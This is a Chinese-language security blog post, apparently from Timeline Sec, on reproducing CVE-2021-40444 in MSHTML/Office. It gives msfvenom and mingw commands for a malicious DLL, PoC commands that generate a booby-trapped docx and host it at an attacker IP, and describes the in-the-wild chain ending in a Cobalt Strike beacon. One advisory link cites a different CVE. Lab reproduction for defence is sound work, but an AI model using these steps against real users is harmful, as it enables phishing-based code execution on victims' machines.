Microsoft报告了一个名为 CVE-2021-40444 的0day漏洞,利用该漏洞可以在受害者的计算机上远程执行恶意代码。黑客可在利用该漏洞攻击 Microsoft Office 用户拿下主机。
编号:CVE-2021-40444
该漏洞存在于 Internet Explorer 引擎 MSHTML 中。尽管现在很少有人使用 IE(即使是 Microsoft 强烈建议改用其更新的浏览器 Edge),但旧浏览器仍然是现代操作系统的一个组件,其他一些程序使用其引擎来处理 Web 内容。特别是 Word 和 PowerPoint 等 Microsoft Office 应用程序依赖于它。
包括Windows 7/8/8.1/10
Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本
目标靶机office word开启开发工具
需要生成一个恶意的DLL文件,通过msf或者自身编译都行
1)自身编译:
编译:
i686-w64-mingw32-gcc -shared calc.c -o calc.dll
2)msf直接生成:
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll
下载POC代码,到Ubuntu测试服务器上:
https://github.com/lockedbyte/CVE-2021-40444
安装环境所需要的依赖
sudo apt-get install lcab
test/calc.dll (dll的绝对路径)
python3 exploit.py generate test/calc.dll http://ip(启动exp机器的ip)
服务端启动HTTP服务
python3 exploit.py host 80
目标受害机打开生成的docx时
攻击者可以在 Microsoft Office 文档中创建一个恶意的 ActiveX 控件,供 MSHTML 浏览器呈现引擎使用。在准备好嵌入在 MS Office 文档中的恶意 ActiveX 控件后,攻击者必须将恶意文档交付给用户。攻击者大多使用网络钓鱼 (MITRE ATT&CK T1566) 技术将恶意文档作为文档的附件或链接传送。之后,用户必须打开恶意文档才能触发漏洞利用。
例如:
1、当用户打开恶意文档(SHA-256:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52),该.docx下载了一个.html文件(SHA-256:d0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6) 2、下载的 .HTML 文件中包含创建 ActiveX 控件窗口和混淆过的 JavaScript payload。然后,这些 ActiveX 控件去下载一个 .CAB 文件(SHA-256:1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00) 3、CAB 是 Windows 中使用的存档文件格式。然后,payload从 .CAB 文件中提取 .DLL 文件(SHA-256:6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b)并打开提取的文件 4、实际上,这个文件是一个命令执行或者CS的beacon
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934
参考链接:
https://github.com/lockedbyte/CVE-2021-40444
https://blog.csdn.net/weixin_44033675/article/details/120466121
本文作者:Timeline Sec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/176007.html
如有侵权请联系:admin#unsafe.sh